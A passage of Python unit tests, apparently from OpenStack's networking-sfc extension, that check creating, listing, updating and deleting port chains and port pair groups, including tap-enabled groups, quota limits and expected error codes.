pg1['port_pair_group']['id'],
pg2['port_pair_group']['id']
]
},
expected_res_status=400
)
def test_create_port_chain_with_non_consecutive_tap_port_pair_groups(self):
with self.port(
name='port1',
device_id='tap_device1'
) as tap_port1, self.port(
name='port2',
device_id='default_device'
) as ingress_default, self.port(
name='port3',
device_id='default_device'
) as egress_default, self.port(
name='port4',
device_id='tap_device2'
) as tap_port2:
with self.port_pair(
port_pair={
'ingress': tap_port1['port']['id'],
'egress': tap_port1['port']['id']
}
) as tap_pp1, self.port_pair(
port_pair={
'ingress': ingress_default['port']['id'],
'egress': egress_default['port']['id']
}
) as default_pp, self.port_pair(
port_pair={
'ingress': tap_port2['port']['id'],
'egress': tap_port2['port']['id']
}
) as tap_pp2:
with self.port_pair_group(
self.fmt,
{
'port_pairs': [tap_pp1['port_pair']['id']],
'tap_enabled': True,
'port_pair_group_parameters': {
'lb_fields': [],
'ppg_n_tuple_mapping': {'ingress_n_tuple': {},
'egress_n_tuple': {}}}
}
) as tap_pg1, self.port_pair_group(
self.fmt,
{
'port_pairs': [default_pp['port_pair']['id']],
'tap_enabled': False,
'port_pair_group_parameters': {
'lb_fields': [],
'ppg_n_tuple_mapping': {'ingress_n_tuple': {},
'egress_n_tuple': {}}
}
}
) as default_pg, self.port_pair_group(
self.fmt,
{
'port_pairs': [tap_pp2['port_pair']['id']],
'tap_enabled': True,
'port_pair_group_parameters': {
'lb_fields': [],
'ppg_n_tuple_mapping': {'ingress_n_tuple': {},
'egress_n_tuple': {}
}
}
}
) as tap_pg2:
self._test_create_port_chain(
{
'port_pair_groups': [
tap_pg1['port_pair_group']['id'],
default_pg['port_pair_group']['id'],
tap_pg2['port_pair_group']['id']
]
}
)
def test_create_port_chain_with_invalid_chain_parameters(self):
with self.port_pair_group(port_pair_group={}) as pg:
self._create_port_chain(
self.fmt, {
'chain_parameters': {'correlation': 'unknown'},
'port_pair_groups': [pg['port_pair_group']['id']]
}, expected_res_status=400
)
def test_create_port_chain_with_invalid_chain_parameters_symmetric(self):
with self.port_pair_group(port_pair_group={}) as pg:
self._create_port_chain(
self.fmt, {
'chain_parameters': {'symmetric': 'abc'},
'port_pair_groups': [pg['port_pair_group']['id']]
}, expected_res_status=400
)
def test_create_port_chain_unknown_flow_classifiers(self):
with self.port_pair_group(port_pair_group={}) as pg:
self._create_port_chain(
self.fmt, {
'flow_classifiers': [uuidutils.generate_uuid()],
'port_pair_groups': [pg['port_pair_group']['id']]
}, expected_res_status=404
)
def test_create_port_chain_nouuid_flow_classifiers(self):
with self.port_pair_group(port_pair_group={}) as pg:
self._create_port_chain(
self.fmt, {
'flow_classifiers': ['unknown'],
'port_pair_groups': [pg['port_pair_group']['id']]
}, expected_res_status=400
)
def test_list_port_chains(self):
with self.port_pair_group(
port_pair_group={}
) as pg1, self.port_pair_group(
port_pair_group={}
) as pg2:
with self.port_chain(port_chain={
'port_pair_groups': [pg1['port_pair_group']['id']]
}) as pc1, self.port_chain(port_chain={
'port_pair_groups': [pg2['port_pair_group']['id']]
}) as pc2:
port_chains = [pc1, pc2]
self._test_list_resources(
'port_chain', port_chains
)
def test_list_port_chains_with_params(self):
with self.port_pair_group(
port_pair_group={}
) as pg1, self.port_pair_group(
port_pair_group={}
) as pg2:
with self.port_chain(port_chain={
'name': 'test1',
'port_pair_groups': [pg1['port_pair_group']['id']]
}) as pc1, self.port_chain(port_chain={
'name': 'test2',
'port_pair_groups': [pg2['port_pair_group']['id']]
}) as pc2:
self._test_list_resources(
'port_chain', [pc1],
query_params='name=test1'
)
self._test_list_resources(
'port_chain', [pc2],
query_params='name=test2'
)
self._test_list_resources(
'port_chain', [],
query_params='name=test3'
)
def test_list_port_chains_with_unknown_params(self):
with self.port_pair_group(
port_pair_group={}
) as pg1, self.port_pair_group(
port_pair_group={}
) as pg2:
with self.port_chain(port_chain={
'name': 'test1',
'port_pair_groups': [pg1['port_pair_group']['id']]
}) as pc1, self.port_chain(port_chain={
'name': 'test2',
'port_pair_groups': [pg2['port_pair_group']['id']]
}) as pc2:
self._test_list_resources(
'port_chain', [pc1, pc2],
query_params='hello=test3'
)
def test_show_port_chain(self):
with self.port_pair_group(
port_pair_group={}
) as pg:
with self.port_chain(port_chain={
'name': 'test1',
'description': 'portchain',
'port_pair_groups': [pg['port_pair_group']['id']]
}) as pc:
req = self.new_show_request(
'port_chains', pc['port_chain']['id']
)
res = self.deserialize(
self.fmt, req.get_response(self.ext_api)
)
expected = self._get_expected_port_chain(pc['port_chain'])
self._assert_port_chain_equal(res['port_chain'], expected)
def test_show_port_chain_noexist(self):
req = self.new_show_request(
'port_chains', '1'
)
res = req.get_response(self.ext_api)
self.assertEqual(404, res.status_int)
def test_update_port_chain_add_flow_classifiers(self):
with self.port(
name='test1'
) as port:
with self.flow_classifier(
flow_classifier={
'source_ip_prefix': '192.168.100.0/24',
'logical_source_port': port['port']['id']
}
) as fc1, self.flow_classifier(
flow_classifier={
'source_ip_prefix': '192.168.101.0/24',
'logical_source_port': port['port']['id']
}
) as fc2:
with self.port_pair_group(
port_pair_group={}
) as pg:
with self.port_chain(port_chain={
'name': 'test1',
'description': 'desc1',
'port_pair_groups': [pg['port_pair_group']['id']],
'flow_classifiers': [fc1['flow_classifier']['id']]
}) as pc:
updates = {
'name': 'test2',
'description': 'desc2',
'flow_classifiers': [
fc1['flow_classifier']['id'],
fc2['flow_classifier']['id']
]
}
req = self.new_update_request(
'port_chains', {'port_chain': updates},
pc['port_chain']['id']
)
res = self.deserialize(
self.fmt,
req.get_response(self.ext_api)
)
expected = pc['port_chain']
expected.update(updates)
self._assert_port_chain_equal(
res['port_chain'], expected
)
req = self.new_show_request(
'port_chains', pc['port_chain']['id']
)
res = self.deserialize(
self.fmt, req.get_response(self.ext_api)
)
self._assert_port_chain_equal(
res['port_chain'], expected
)
def test_update_port_chain_remove_flow_classifiers(self):
with self.port(
name='test1'
) as port:
with self.flow_classifier(
flow_classifier={
'source_ip_prefix': '192.168.100.0/24',
'logical_source_port': port['port']['id']
}
) as fc1, self.flow_classifier(
flow_classifier={
'source_ip_prefix': '192.168.101.0/24',
'logical_source_port': port['port']['id']
}
) as fc2:
with self.port_pair_group(
port_pair_group={}
) as pg:
with self.port_chain(port_chain={
'name': 'test1',
'description': 'desc1',
'port_pair_groups': [pg['port_pair_group']['id']],
'flow_classifiers': [
fc1['flow_classifier']['id'],
fc2['flow_classifier']['id']
]
}) as pc:
updates = {
'name': 'test2',
'description': 'desc2',
'flow_classifiers': [
fc1['flow_classifier']['id']
]
}
req = self.new_update_request(
'port_chains', {'port_chain': updates},
pc['port_chain']['id']
)
res = self.deserialize(
self.fmt,
req.get_response(self.ext_api)
)
expected = pc['port_chain']
expected.update(updates)
self._assert_port_chain_equal(
res['port_chain'], expected
)
req = self.new_show_request(
'port_chains', pc['port_chain']['id']
)
res = self.deserialize(
self.fmt, req.get_response(self.ext_api)
)
self._assert_port_chain_equal(
res['port_chain'], expected
)
def test_update_port_chain_replace_flow_classifiers(self):
with self.port(
name='test1'
) as port:
with self.flow_classifier(
flow_classifier={
'source_ip_prefix': '192.168.100.0/24',
'logical_source_port': port['port']['id']
}
) as fc1, self.flow_classifier(
flow_classifier={
'source_ip_prefix': '192.168.101.0/24',
'logical_source_port': port['port']['id']
}
) as fc2:
with self.port_pair_group(
port_pair_group={}
) as pg:
with self.port_chain(port_chain={
'name': 'test1',
'description': 'desc1',
'port_pair_groups': [pg['port_pair_group']['id']],
'flow_classifiers': [fc1['flow_classifier']['id']]
}) as pc:
updates = {
'name': 'test2',
'description': 'desc2',
'flow_classifiers': [fc2['flow_classifier']['id']]
}
req = self.new_update_request(
'port_chains', {'port_chain': updates},
pc['port_chain']['id']
)
res = self.deserialize(
self.fmt,
req.get_response(self.ext_api)
)
expected = pc['port_chain']
expected.update(updates)
self._assert_port_chain_equal(
res['port_chain'], expected
)
req = self.new_show_request(
'port_chains', pc['port_chain']['id']
)
res = self.deserialize(
self.fmt, req.get_response(self.ext_api)
)
self._assert_port_chain_equal(
res['port_chain'], expected
)
def test_update_port_chain_flow_classifiers_basic_the_same(self):
with self.port(
name='test1'
) as port1, self.port(
name='test2'
) as port2:
with self.flow_classifier(
flow_classifier={
'source_ip_prefix': '192.168.100.0/24',
'logical_source_port': port1['port']['id']
}
) as fc1, self.flow_classifier(
flow_classifier={
'source_ip_prefix': '192.168.100.0/24',
'logical_source_port': port2['port']['id']
}
) as fc2:
with self.port_pair_group(
port_pair_group={}
) as pg:
with self.port_chain(port_chain={
'name': 'test1',
'description': 'desc1',
'port_pair_groups': [pg['port_pair_group']['id']],
'flow_classifiers': [fc1['flow_classifier']['id']]
}) as pc:
updates = {
'name': 'test2',
'description': 'desc2',
'flow_classifiers': [fc2['flow_classifier']['id']]
}
req = self.new_update_request(
'port_chains', {'port_chain': updates},
pc['port_chain']['id']
)
res = self.deserialize(
self.fmt,
req.get_response(self.ext_api)
)
expected = pc['port_chain']
expected.update(updates)
self._assert_port_chain_equal(
res['port_chain'], expected
)
req = self.new_show_request(
'port_chains', pc['port_chain']['id']
)
res = self.deserialize(
self.fmt, req.get_response(self.ext_api)
)
self._assert_port_chain_equal(
res['port_chain'], expected
)
def test_update_port_chain_conflict_flow_classifiers(self):
with self.port(
name='test1'
) as port1, self.port(
name='test2'
) as port2:
with self.flow_classifier(
flow_classifier={
'source_ip_prefix': '192.168.100.0/24',
'logical_source_port': port1['port']['id']
}
) as fc1, self.flow_classifier(
flow_classifier={
'source_ip_prefix': '192.168.101.0/24',
'logical_source_port': port1['port']['id']
}
) as fc2, self.flow_classifier(
flow_classifier={
'source_ip_prefix': '192.168.100.0/24',
'logical_source_port': port2['port']['id']
}
) as fc3:
with self.port_pair_group(
port_pair_group={}
) as pg1, self.port_pair_group(
port_pair_group={}
) as pg2:
with self.port_chain(port_chain={
'port_pair_groups': [pg1['port_pair_group']['id']],
'flow_classifiers': [fc1['flow_classifier']['id']]
}), self.port_chain(port_chain={
'name': 'test2',
'port_pair_groups': [pg2['port_pair_group']['id']],
'flow_classifiers': [fc2['flow_classifier']['id']]
}) as pc2:
updates = {
'flow_classifiers': [fc3['flow_classifier']['id']]
}
req = self.new_update_request(
'port_chains', {'port_chain': updates},
pc2['port_chain']['id']
)
res = req.get_response(self.ext_api)
self.assertEqual(400, res.status_int)
def test_update_port_chain_add_port_pair_groups(self):
with self.port_pair_group(
port_pair_group={}
) as pg1, self.port_pair_group(
port_pair_group={}
) as pg2:
with self.port_chain(port_chain={
'port_pair_groups': [pg1['port_pair_group']['id']],
}) as pc:
updates = {
'port_pair_groups': [
pg1['port_pair_group']['id'],
pg2['port_pair_group']['id']
]
}
req = self.new_update_request(
'port_chains', {'port_chain': updates},
pc['port_chain']['id']
)
res = self.deserialize(
self.fmt,
req.get_response(self.ext_api)
)
expected = pc['port_chain']
expected.update(updates)
self._assert_port_chain_equal(res['port_chain'], expected)
req = self.new_show_request(
'port_chains', pc['port_chain']['id']
)
res = self.deserialize(
self.fmt, req.get_response(self.ext_api)
)
self._assert_port_chain_equal(res['port_chain'], expected)
def test_update_port_chain_remove_port_pair_groups(self):
with self.port_pair_group(
port_pair_group={}
) as pg1, self.port_pair_group(
port_pair_group={}
) as pg2:
with self.port_chain(port_chain={
'port_pair_groups': [
pg1['port_pair_group']['id'],
pg2['port_pair_group']['id'],
],
}) as pc:
updates = {
'port_pair_groups': [
pg1['port_pair_group']['id']
]
}
req = self.new_update_request(
'port_chains', {'port_chain': updates},
pc['port_chain']['id']
)
res = self.deserialize(
self.fmt,
req.get_response(self.ext_api)
)
expected = pc['port_chain']
expected.update(updates)
self._assert_port_chain_equal(res['port_chain'], expected)
req = self.new_show_request(
'port_chains', pc['port_chain']['id']
)
res = self.deserialize(
self.fmt, req.get_response(self.ext_api)
)
self._assert_port_chain_equal(res['port_chain'], expected)
def test_update_port_chain_replace_port_pair_groups(self):
with self.port_pair_group(
port_pair_group={}
) as pg1, self.port_pair_group(
port_pair_group={}
) as pg2:
with self.port_chain(port_chain={
'port_pair_groups': [pg1['port_pair_group']['id']],
}) as pc:
updates = {
'port_pair_groups': [pg2['port_pair_group']['id']]
}
req = self.new_update_request(
'port_chains', {'port_chain': updates},
pc['port_chain']['id']
)
res = self.deserialize(
self.fmt,
req.get_response(self.ext_api)
)
expected = pc['port_chain']
expected.update(updates)
self._assert_port_chain_equal(res['port_chain'], expected)
req = self.new_show_request(
'port_chains', pc['port_chain']['id']
)
res = self.deserialize(
self.fmt, req.get_response(self.ext_api)
)
self._assert_port_chain_equal(res['port_chain'], expected)
def test_update_port_chain_chain_parameters(self):
with self.port_pair_group(
port_pair_group={}
) as pg:
with self.port_chain(port_chain={
'port_pair_groups': [pg['port_pair_group']['id']],
}) as pc:
updates = {
'chain_parameters': {'correlation': 'mpls'}
}
req = self.new_update_request(
'port_chains', {'port_chain': updates},
pc['port_chain']['id']
)
res = req.get_response(self.ext_api)
self.assertEqual(400, res.status_int)
def test_update_port_chain_part_of_graph_fail(self):
with self.port_pair_group(
port_pair_group={}
) as pg1, self.port_pair_group(
port_pair_group={}
) as pg2:
with self.port_chain(port_chain={
'port_pair_groups': [pg1['port_pair_group']['id']]
}) as pc1, self.port_chain(port_chain={
'port_pair_groups': [pg2['port_pair_group']['id']]
}) as pc2:
with self.service_graph(service_graph={
'name': 'test1',
'port_chains': {
pc1['port_chain']['id']: [pc2['port_chain']['id']]}
}):
updates = {
'port_pair_groups': [uuidutils.generate_uuid()]
}
req = self.new_update_request(
'port_chains', {'port_chain': updates},
pc1['port_chain']['id']
)
res = req.get_response(self.ext_api)
self.assertEqual(409, res.status_int)
updates = {
'flow_classifiers': [uuidutils.generate_uuid()]
}
req = self.new_update_request(
'port_chains', {'port_chain': updates},
pc2['port_chain']['id']
)
res = req.get_response(self.ext_api)
self.assertEqual(409, res.status_int)
updates = {
'name': 'new name',
'description': 'new description'
}
req = self.new_update_request(
'port_chains', {'port_chain': updates},
pc1['port_chain']['id']
)
res = req.get_response(self.ext_api)
self.assertEqual(200, res.status_int)
def test_update_port_chain_consistency_with_consecutive_tap_ppg(self):
with self.port(
name='port1',
device_id='tap_device1'
) as tap_port1, self.port(
name='port2',
device_id='tap_device2'
) as tap_port2:
with self.port_pair(
port_pair={
'ingress': tap_port1['port']['id'],
'egress': tap_port1['port']['id']
}
) as tap_pp1, self.port_pair(
port_pair={
'ingress': tap_port2['port']['id'],
'egress': tap_port2['port']['id']
}
) as tap_pp2:
with self.port_pair_group(
self.fmt,
{
'port_pairs': [tap_pp1['port_pair']['id']],
'tap_enabled': True
}
) as pg1, self.port_pair_group(
self.fmt,
{
'port_pairs': [tap_pp2['port_pair']['id']],
'tap_enabled': True
}
) as pg2:
with self.port_chain(
port_chain={
'port_pair_groups': [
pg1['port_pair_group']['id']
]
}
) as pc:
updates = {
'port_pair_groups': [
pg1['port_pair_group']['id'],
pg2['port_pair_group']['id']
]
}
req = self.new_update_request(
'port_chains', {'port_chain': updates},
pc['port_chain']['id']
)
res = req.get_response(self.ext_api)
self.assertEqual(400, res.status_int)
def test_update_tap_port_chain_consistency(self):
with self.port(
name='port1',
device_id='tap_device1'
) as tap_port1, self.port(
name='port2',
device_id='tap_device2'
) as tap_port2:
with self.port_pair(
port_pair={
'ingress': tap_port1['port']['id'],
'egress': tap_port1['port']['id']
}
) as tap_pp1, self.port_pair(
port_pair={
'ingress': tap_port2['port']['id'],
'egress': tap_port2['port']['id']
}
) as tap_pp2:
with self.port_pair_group(
self.fmt,
{
'port_pairs': [tap_pp1['port_pair']['id']],
'tap_enabled': True
}
) as pg1, self.port_pair_group(
self.fmt,
{
'port_pairs': [tap_pp2['port_pair']['id']],
'tap_enabled': False
}
) as pg2:
with self.port_chain(
port_chain={
'port_pair_groups': [
pg1['port_pair_group']['id']
]
}
) as pc:
updates = {
'port_pair_groups': [
pg1['port_pair_group']['id'],
pg2['port_pair_group']['id']
]
}
req = self.new_update_request(
'port_chains', {'port_chain': updates},
pc['port_chain']['id']
)
resp = req.get_response(self.ext_api)
self.assertEqual(200, resp.status_int)
res = self.deserialize(self.fmt, resp)
expected = pc['port_chain']
expected.update(updates)
self._assert_port_chain_equal(res['port_chain'],
expected)
def test_delete_port_chain(self):
with self.port_pair_group(
port_pair_group={}
) as pg:
with self.port_chain(port_chain={
'port_pair_groups': [pg['port_pair_group']['id']]
}, do_delete=False) as pc:
req = self.new_delete_request(
'port_chains', pc['port_chain']['id']
)
res = req.get_response(self.ext_api)
self.assertEqual(204, res.status_int)
req = self.new_show_request(
'port_chains', pc['port_chain']['id']
)
res = req.get_response(self.ext_api)
self.assertEqual(404, res.status_int)
req = self.new_show_request(
'port_pair_groups', pg['port_pair_group']['id']
)
res = req.get_response(self.ext_api)
self.assertEqual(200, res.status_int)
def test_delete_port_chain_noexist(self):
req = self.new_delete_request(
'port_chains', '1'
)
res = req.get_response(self.ext_api)
self.assertEqual(404, res.status_int)
def test_delete_port_chain_part_of_graph_fail(self):
with self.port_pair_group(
port_pair_group={}
) as pg1, self.port_pair_group(
port_pair_group={}
) as pg2:
with self.port_chain(port_chain={
'port_pair_groups': [pg1['port_pair_group']['id']]
}) as pc1, self.port_chain(port_chain={
'port_pair_groups': [pg2['port_pair_group']['id']]
}) as pc2:
with self.service_graph(service_graph={
'name': 'test1',
'port_chains': {
pc1['port_chain']['id']: [pc2['port_chain']['id']]}
}):
req = self.new_delete_request(
'port_chains', pc1['port_chain']['id']
)
res = req.get_response(self.ext_api)
self.assertEqual(409, res.status_int)
req = self.new_delete_request(
'port_chains', pc2['port_chain']['id']
)
res = req.get_response(self.ext_api)
self.assertEqual(409, res.status_int)
def test_delete_flow_classifier_port_chain_exist(self):
with self.port(
name='test1'
) as port:
with self.flow_classifier(flow_classifier={
'logical_source_port': port['port']['id']
}) as fc:
with self.port_pair_group(port_pair_group={
}) as pg:
with self.port_chain(port_chain={
'port_pair_groups': [pg['port_pair_group']['id']],
'flow_classifiers': [fc['flow_classifier']['id']]
}):
req = self.new_delete_request(
'flow_classifiers', fc['flow_classifier']['id']
)
res = req.get_response(self.ext_api)
self.assertEqual(409, res.status_int)
def test_create_port_pair_group(self):
self._test_create_port_pair_group({})
def test_quota_create_port_pair_group_quota(self):
cfg.CONF.set_override('quota_port_pair_group', 3, group='QUOTAS')
self._create_port_pair_group(
self.fmt, {'port_pairs': []}, expected_res_status=201
)
self._create_port_pair_group(
self.fmt, {'port_pairs': []}, expected_res_status=201
)
self._create_port_pair_group(
self.fmt, {'port_pairs': []}, expected_res_status=201
)
self._create_port_pair_group(
self.fmt, {'port_pairs': []}, expected_res_status=409
)
def test_create_port_pair_group_all_fields(self):
self._test_create_port_pair_group({
'name': 'test1',
'description': 'desc1',
'port_pairs': [],
'tap_enabled': False,
'port_pair_group_parameters': {
'lb_fields': ['ip_src', 'ip_dst'],
'ppg_n_tuple_mapping': {
'ingress_n_tuple': {'source_ip_prefix': None},
'egress_n_tuple': {'destination_ip_prefix': None}}
}
})
def test_create_port_pair_group_with_empty_parameters(self):
self._test_create_port_pair_group({
'name': 'test1',
'description': 'desc1',
'port_pairs': [],
'port_pair_group_parameters': {}
})
def test_create_port_pair_group_with_none_parameters(self):
self._test_create_port_pair_group({
'name': 'test1',
'description': 'desc1',
'port_pairs': [],
'port_pair_group_parameters': None
})
def test_create_port_pair_group_with_default_parameters(self):
self._test_create_port_pair_group({
'name': 'test1',
'description': 'desc1',
'port_pairs': [],
'tap_enabled': False,
'port_pair_group_parameters': {
'lb_fields': [],
'ppg_n_tuple_mapping': {}
}
})
def test_create_port_pair_group_with_tap_enabled_parameter_true(self):
self._test_create_port_pair_group(
{
'name': 'test1',
'description': 'desc1',
'port_pairs': [],
'tap_enabled': True,
'port_pair_group_parameters': {}
},
expected_port_pair_group={
'name': 'test1',
'description': 'desc1',
'port_pairs': [],
'tap_enabled': True,
'port_pair_group_parameters': {
'lb_fields': [],
'ppg_n_tuple_mapping': {u'egress_n_tuple': {},
u'ingress_n_tuple': {}},
}
}
)
def test_create_ppg_with_all_params_and_tap_enabled_parameter_true(self):
self._create_port_pair_group(
self.fmt,
{
'name': 'test1',
'description': 'desc1',
'port_pairs': [],
'tap_enabled': True,
'port_pair_group_parameters': {
'lb_fields': ['ip_src', 'ip_dst'],
'ppg_n_tuple_mapping': {
'ingress_n_tuple': {'source_ip_prefix': None},
'egress_n_tuple': {'destination_ip_prefix': None}}
}
})
def test_create_port_pair_group_with_port_pairs(self):
with self.port(
name='port1',
device_id='default'
) as src_port, self.port(
name='port2',
device_id='default'
) as dst_port:
with self.port_pair(port_pair={
'ingress': src_port['port']['id'],
'egress': dst_port['port']['id']
}) as pp1, self.port_pair(port_pair={
'ingress': dst_port['port']['id'],
'egress': src_port['port']['id']
}) as pp2:
self._test_create_port_pair_group({
'port_pairs': [
pp1['port_pair']['id'],
pp2['port_pair']['id']
]
})
def test_create_tap_port_pair_group_with_single_port_pair(self):
with self.port(
name='port1',
device_id='default'
) as src_port, self.port(
name='port2',
device_id='default'
) as dst_port:
with self.port_pair(port_pair={
'ingress': src_port['port']['id'],
'egress': dst_port['port']['id']
}) as pp1:
self._test_create_port_pair_group(
{
'port_pairs': [
pp1['port_pair']['id'],
],
'tap_enabled': True
}
)
def test_create_tap_pair_group_with_multiple_port_pairs(self):
with self.port(
name='port1',
device_id='default'
) as src_port, self.port(
name='port2',
device_id='default'
) as dst_port:
with self.port_pair(port_pair={
'ingress': src_port['port']['id'],
'egress': dst_port['port']['id']
}) as pp1, self.port_pair(port_pair={
'ingress': dst_port['port']['id'],
'egress': src_port['port']['id']
}) as pp2:
self._create_port_pair_group(
self.fmt,
{
'port_pairs': [
pp1['port_pair']['id'],
pp2['port_pair']['id']
],
'tap_enabled': True
},
expected_res_status=400
)
def test_create_port_pair_group_consistent_correlations(self):
with self.port(
name='port1',
device_id='default'
) as src_port, self.port(
name='port2',
device_id='default'
) as dst_port:
with self.port_pair(port_pair={
'ingress': src_port['port']['id'],
'egress': dst_port['port']['id'],
'service_function_parameters': {'correlation': 'mpls'}
}) as pp1, self.port_pair(port_pair={
'ingress': dst_port['port']['id'],
'egress': src_port['port']['id'],
'service_function_parameters': {'correlation': 'mpls'}
}) as pp2:
self._test_create_port_pair_group({
'port_pairs': [
pp1['port_pair']['id'],
pp2['port_pair']['id']
]
})
def test_create_port_pair_group_inconsistent_correlations(self):
with self.port(
name='port1',
device_id='default'
) as src_port, self.port(
name='port2',
device_id='default'
) as dst_port:
with self.port_pair(port_pair={
'ingress': src_port['port']['id'],
'egress': dst_port['port']['id'],
'service_function_parameters': {'correlation': 'mpls'}
}) as pp1, self.port_pair(port_pair={
'ingress': dst_port['port']['id'],
'egress': src_port['port']['id'],
'service_function_parameters': {'correlation': None}
}) as pp2:
self._create_port_pair_group(
self.fmt,
{'port_pairs': [
pp1['port_pair']['id'],
pp2['port_pair']['id']
]},
expected_res_status=400)
def test_create_port_pair_group_with_nouuid_port_pair_id(self):
self._create_port_pair_group(
self.fmt, {'port_pairs': ['unknown']},
expected_res_status=400
)
def test_create_port_pair_group_with_unknown_port_pair_id(self):
self._create_port_pair_group(
self.fmt, {'port_pairs': [uuidutils.generate_uuid()]},
expected_res_status=404
)
def test_create_port_pair_group_share_port_pair_id(self):
with self.port(
name='port1',
device_id='default'
) as src_port, self.port(
name='port2',
device_id='default'
) as dst_port:
with self.port_pair(port_pair={
'ingress': src_port['port']['id'],
'egress': dst_port['port']['id']
}) as pp:
with self.port_pair_group(port_pair_group={
'port_pairs': [pp['port_pair']['id']]
}):
self._create_port_pair_group(
self.fmt, {'port_pairs': [pp['port_pair']['id']]},
expected_res_status=409
)
def test_list_port_pair_groups(self):
with self.port_pair_group(port_pair_group={
'name': 'test1'
}) as pc1, self.port_pair_group(port_pair_group={
'name': 'test2'
}) as pc2:
port_pair_groups = [pc1, pc2]
self._test_list_resources(
'port_pair_group', port_pair_groups
)
def test_list_port_pair_groups_with_params(self):
with self.port_pair_group(port_pair_group={
'name': 'test1'
}) as pc1, self.port_pair_group(port_pair_group={
'name': 'test2'
}) as pc2:
self._test_list_resources(
'port_pair_group', [pc1],
query_params='name=test1'
)
self._test_list_resources(
'port_pair_group', [pc2],
query_params='name=test2'
)
self._test_list_resources(
'port_pair_group', [],
query_params='name=test3'
)
def test_list_port_pair_groups_with_unknown_params(self):
with self.port_pair_group(port_pair_group={
'name': 'test1'
}) as pc1, self.port_pair_group(port_pair_group={
'name': 'test2'
}) as pc2:
self._test_list_resources(
'port_pair_group', [pc1, pc2],
query_params='hello=test3'
)
def test_show_port_pair_group(self):
with self.port_pair_group(port_pair_group={
'name': 'test1'
}) as pc:
req = self.new_show_request(
'port_pair_groups', pc['port_pair_group']['id']
)
res = self.deserialize(
self.fmt, req.get_response(self.ext_api)
)
for k, v in pc['port_pair_group'].items():
self.assertEqual(res['port_pair_group'][k], v)
def test_show_port_pair_group_noexist(self):
req = self.new_show_request(
'port_pair_groups', '1'
)
res = req.get_response(self.ext_api)
self.assertEqual(404, res.status_int)
def test_update_port_pair_group(self):
with self.port(
name='port1',
device_id='default'
) as src_port, self.port(
name='port2',
device_id='default'
) as dst_port:
with self.port_pair(port_pair={
'ingress': src_port['port']['id'],
'egress': dst_port['port']['id']
}) as pp1, self.port_pair(port_pair={
'ingress': dst_port['port']['id'],
'egress': src_port['port']['id']
}) as pp2:
with self.port_pair_group(port_pair_group={
'name': 'test1',
'description': 'desc1',
'port_pairs': [pp1['port_pair']['id']]
}) as pg:
updates = {
'name': 'test2',
'description': 'desc2',
'port_pairs': [pp2['port_pair']['id']]
}
req = self.new_update_request(
'port_pair_groups', {'port_pair_group': updates},
pg['port_pair_group']['id']
)
res = self.deserialize(
self.fmt,
req.get_response(self.ext_api)
)
expected = pg['port_pair_group']
expected.update(updates)
for k, v in expected.items():
self.assertEqual(res['port_pair_group'][k], v)
req = self.new_show_request(
'port_pair_groups', pg['port_pair_group']['id']
)
res = self.deserialize(
self.fmt, req.get_response(self.ext_api)
)
for k, v in expected.items():
self.assertEqual(res['port_pair_group'][k], v)
def test_update_port_pair_group_consistency_checks(self):
with self.port(
name='port1',
device_id='default'
) as port1, self.port(
name='port2',
device_id='default'
) as port2, self.port(
name='port3',
device_id='default'
) as port3, self.port(
name='port4',
device_id='default'
) as port4:
with self.port_pair(port_pair={
'ingress': port1['port']['id'],
'egress': port2['port']['id'],
'service_function_parameters': {'correlation': 'mpls'}
}) as pp1, self.port_pair(port_pair={
'ingress': port2['port']['id'],
'egress': port3['port']['id'],
'service_function_parameters': {'correlation': 'mpls'}
}) as pp2, self.port_pair(port_pair={
'ingress': port3['port']['id'],
'egress': port4['port']['id'],
'service_function_parameters': {'correlation': None}
}) as pp3, self.port_pair(port_pair={
'ingress': port4['port']['id'],
'egress': port1['port']['id'],
'service_function_parameters': {'correlation': 'mpls'}
}) as pp4:
with self.port_pair_group(port_pair_group={
'name': 'test1',
'description': 'desc1',
'port_pairs': [pp1['port_pair']['id'],
pp2['port_pair']['id']]
}) as pg:
updates = {
'name': 'test2',
'description': 'desc2',
'port_pairs': [pp1['port_pair']['id'],
pp2['port_pair']['id'],
pp3['port_pair']['id']]
}
req = self.new_update_request(
'port_pair_groups', {'port_pair_group': updates},
pg['port_pair_group']['id']
)
resp = req.get_response(self.ext_api)
self.assertEqual(400, resp.status_int)
updates = {
'name': 'test3',
'description': 'desc3',
'port_pairs': [pp1['port_pair']['id'],
pp2['port_pair']['id'],
pp4['port_pair']['id']]
}
req = self.new_update_request(
'port_pair_groups', {'port_pair_group': updates},
pg['port_pair_group']['id']
)
resp = req.get_response(self.ext_api)
res = self.deserialize(self.fmt, resp)
expected = pg['port_pair_group']
expected.update(updates)
for k, v in expected.items():
self.assertEqual(res['port_pair_group'][k], v)
req = self.new_show_request(
'port_pair_groups', pg['port_pair_group']['id']
)
res = self.deserialize(
self.fmt, req.get_response(self.ext_api)
)
for k, v in expected.items():
self.assertEqual(res['port_pair_group'][k], v)
def test_update_tap_port_pair_group_consistency(self):
with self.port(
name='port1',
device_id='default'
) as src_port, self.port(
name='port2',
device_id='default'
) as dst_port:
with self.port_pair(port_pair={
'ingress': src_port['port']['id'],
'egress': dst_port['port']['id']
}) as pp1, self.port_pair(port_pair={
'ingress': dst_port['port']['id'],
'egress': src_port['port']['id']
}) as pp2:
with self.port_pair_group(port_pair_group={
'name': 'test1',
'description': 'desc1',
'port_pairs': [pp1['port_pair']['id']],
}) as pg:
updates = {
'name': 'test2',
'description': 'desc2',
'port_pairs': [pp1['port_pair']['id'],
pp2['port_pair']['id']],
'tap_enabled': True
}
req = self.new_update_request(
'port_pair_groups', {'port_pair_group': updates},
pg['port_pair_group']['id']
)
resp = req.get_response(self.ext_api)
self.assertEqual(400, resp.status_int)
def test_delete_port_pair_group(self):
with self.port_pair_group(port_pair_group={
'name': 'test1'
}, do_delete=False) as pc:
req = self.new_delete_request(
'port_pair_groups', pc['port_pair_group']['id']
)
res = req.get_response(self.ext_api)
self.assertEqual(204, res.status_int)
req = self.new_show_request(
'port_pair_groups', pc['port_pair_group']['id']
)
res = req.get_response(self.ext_api)
self.assertEqual(404, res.status_int)
def test_delete_port_pair_group_port_chain_exist(self):
with self.port_pair_group(port_pair_group={
'name': 'test1'
}) as pg:
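            # The group is still referenced by a port chain, so deleting it is
            # expected to return 409 Conflict.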
with self.port_chain(port_chain={
'port_pair_groups': [pg['port_pair_group']['id']]
}):
req = self.new_delete_request(
'port_pair_groups', pg['port_pair_group']['id']
)
res = req.get_response(self.ext_api)
self.assertEqual(409, res.status_int)
def test_delete_port_pair_group_noexist(self):
req = self.new_delete_request(
'port_pair_groups', '1'
)
res = req.get_response(self.ext_api)
self.assertEqual(404, res.status_int)
